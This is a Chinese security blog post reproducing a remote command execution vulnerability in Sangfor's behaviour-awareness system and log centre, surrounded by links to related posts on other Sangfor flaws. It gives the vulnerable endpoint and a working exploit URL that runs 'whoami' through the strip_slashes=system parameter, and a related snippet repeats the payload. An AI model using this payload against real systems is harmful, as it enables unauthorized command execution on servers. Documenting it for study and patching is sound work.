深信服行为感知系统&&日志中心远程命令执行漏洞

最新推荐文章于 2025-01-18 21:43:22 发布

原创最新推荐文章于 2025-01-18 21:43:22 发布 · 3.3k 阅读

2 ·

CC 4.0 BY-SA版权

漏洞复现专栏收录该内容

27 篇文章

订阅专栏

本文揭示了深信服行为感知系统和日志中心存在的远程命令执行漏洞，详细描述了漏洞利用过程，包括通过/tool/log/c.php?strip_slashes=system参数触发命令执行。提醒用户勿用于非法测试，以免造成不良后果。影响范围明确，提供了漏洞复现步骤。

声明

1、该公众号发布文章仅供学习使用。
2、请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

漏洞描述

深信服行为感知系统&&日志中心远程命令执行漏洞，使用与EDR相同模板和部分文件导致命令执行

影响范围

深信服行为感知系统和日志中心

漏洞复现

漏洞地址：

/tool/log/c.php?strip_slashes=system&host=

首页：
在这里插入图片描述
执行：

https://ip/tool/log/c.php?strip_slashes=system&host=whoami

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

0x大先生

关注关注

2
点赞
踩
2

收藏

觉得还不错? 一键收藏
3
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

深信服SG上网优化管理系统存在任意文件读取漏洞附POC

nnn2188185的博客

10-04

793

深信服SG上网优化管理系统 catjs.php接口存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器上的敏感文件。

[系统安全] 三十二.恶意代码检测(2)常用技术详解及总结

3 条评论

k↑ 2021.06.10
写的不错哦！

大家一起学编程（python） 2021.06.09
强到离谱

游戏源码_ 2021.06.08
今天点赞次数用完了，收藏一波支持博主，文章写得很好，初来乍到，希望多多关注，期待你的回复，谢谢！

深信服行为感知命令执行漏洞

剁椒鱼头没剁椒的博客

01-18

5453

深信服 行为感知系统c.php远程命令执行漏洞，使用与EDR相同模板和部分文件导致命令执行。其实整个过程和深信服EDR命令执行漏洞差不多。其实整个URL和EDR差不多。

深信服 行为感知系统 c.php 远程命令执行漏洞

weixin_46801402的博客

11-09

1141

深信服 行为感知系统 c.php 远程命令执行漏洞

深信服EDR漏洞复现

黑白的博客

11-06

1928

声明往后，复现的每个漏洞，我都会分享出来，希望可以通过这种方式，提高自己的能力，也希望大家可以一起学习，共同进步漏洞描述据说是有人把源码放网上了，不过看了看源码审计的骨偶成，也确实利用php反序列化，从而RCE 深信服终端检测响应平台EDR，围绕终端资产安全生命周期，通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。支持统一化的终端资产管理、终端病毒查杀、终端合规性检查和访问控制策略管理，支持对安全事件的一键隔离处置，以及对热点事件IOC

AC上网行为管理之行为感知系统部署

weixin_53946822的博客

11-21

475

1、目前支持 Windows Server 2008 及之后的服务器操作系统，并且系统要求是 64 位操作。2、在AC/SG设备中【系统管理】-【系统配置】-【日志中心配置】配置外置日志中心同步策略。1、在行为感知系统【系统配置】-【同步策略】建立同步策略与上网行为管理设备对接同步。1、内外置BA都支持【日志导出】功能，将审计的日志根据需要自定义导出。2、安装行为感知的服务器建议使用双核的CPU，内存2G以上。3、AC设备与外置数据中心通讯端口能正常通信。3、勾选导出内容和导出方式，即可将日志完成导出。

2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享！

记录开发和安全学习过程中的点点滴滴

04-22

4238

也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.

深信服云镜安全风险评估系统用户指南

- 日志审计：记录系统操作日志，便于追踪异常行为，支持日志筛选、导出和删除。 8. 安全评估 - 新建任务：创建不同类型的安全评估任务，包括资产发现、系统漏洞扫描、弱口令扫描、Web漏洞扫描和基线配置核查。 -...

深信服EDR-pt1 MSS板块小测练习

最新发布

Jinmuyan_的博客

01-18

1445

A.针对服务经理已输出的服务汇报材料，按需补充相关内容后，提前预约客户对接人和决策人确定好时间，负责线下到客户现场，面向客户汇报服务的进度和成果以及下一步计划，输出会议纪要反馈给云端服务经理。B.了解项目风险，推动风险问题处置和闭环；C.针对服务经理已输出的外部启动会材料，按需补充相关内容后，提前预约客户对接人和决策人确定好时间，负责线下到客户现场召开服务启动会。A.负责针对首次威胁分析和运营过程中，发现存在的安全策略问题，进行加固或升级组件版本，并面向客户汇报所实施的加固内容。

深信服 SG上网优化管理系统 catjs.php 任意文件读取漏洞[2023-HW]

holyxp的博客

08-19

954

深信服 SG上网优化管理系统 catjs.php 存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器上的敏感文件

深信服行为感知系统和终端检测响应平台EDR REC复现渗透测试

kelenwait的博客

06-24

2034

简介 深信服行为感知系统和终端检测响应平台EDR是深信服科技股份有限公司推出的安全产品，其行为感知系统 c.php 存在远程命令执行漏洞，与其相同模板的还有部分EDR,同样导致远程命令执行。漏洞影响 深信服EDR 3.2.16 深信服EDR 3.2.17 深信服EDR 3.2.19 深信服 行为感知系统 漏洞复现登录界面 c.php 远程命令执行漏洞使用以下poc进行访问 /tool/log/c.php?strip_slashes=system&host=echo hello /tool/l

深信服edr终端漏洞

qq_40806924的博客

08-20

4728

一、前言最近这些天来了广州当蓝方，工作之余听到了几个朋友说关于深信服edr爆0day的情况，自己也没时间复现，就简单记录一下。该XXX简介： 深信服终端检测响应平台EDR，围绕终端资产安全生命周期，通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时，通过云网端联动协同、威胁情报共享、多层级响应机制，帮助用户快速处置终端安全问题，构建轻量级、智能化、响应快的下一代终端安全系统。 ** 二、影响范围 fofa上大概有37页

深信服台式感知平台补丁升级

modaner的博客

10-04

374

2、登录态势感知系统，在系统设置-升级管理-系统升级中进行升级。4、系统升级重启后，登录系统检查各项服务是否正常。1、登录深信服技术支持官网，下载最新版的升级包。3、导入刚刚下载的升级包。

【HW2020漏洞回顾】深信服EDR两大漏洞

wuguojie888的博客

08-20

9389

深信服终端检测响应平台EDR，围绕终端资产安全生命周期，通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。支持统一化的终端资产管理、终端病毒查杀、终端合规性检查和访问控制策略管理，支持对安全事件的一键隔离处置，以及对热点事件IOC的全网威胁定位。绝大多数的EDR管理平台部署于内网环境中，少数系统可以通过外网地址访问。 NO.1 后台任意用户登陆漏洞【详情】攻击者可以通过构造payload绕过登录判断，直接拿到系统管理员/用户权..

深信服数据中心管理系统 XXE漏洞复现

0xSec

08-16

2884

深信服数据中心管理系统DC存在XML外部实体注入漏洞。由于后端对传入的XML对象进行了非预期内解析，攻击者可以利用该漏洞进行XML注入攻击，获取系统敏感信息。

深信服 应用交付管理系统 login 存在远程命令执行漏洞

m0_52333295的博客

08-20

1634

深信服 应用交付管理系统 login 存在远程命令执行漏洞，攻击者通过漏洞可以获取服务器权限，执行任意命令。

PHP危险函数及漏洞复现

Feng_Blue_的博客

09-29

1052

危险函数 eval 语句： eval 会将符合php语法规范字符串当作php代码执行,能够实现简单的一句话木马，列如: 但这里我们用Feng来进行中国菜刀连接。连接成功之后如下能直接对对方服务器进行任何控制， assert() assert()同样会将字符串当做PHP 代码来执行。在网页中通过hackbar来操作，是可以执行系统命令，如下图 preg_replace() 这个函数的作用是对字符串进行正则匹配后替换，列如下图： preg_rep...

深信服行为感知系统&&日志中心 远程命令执行漏洞

声明

漏洞描述

影响范围

漏洞复现

3 条评论

深信服行为感知系统&&日志中心远程命令执行漏洞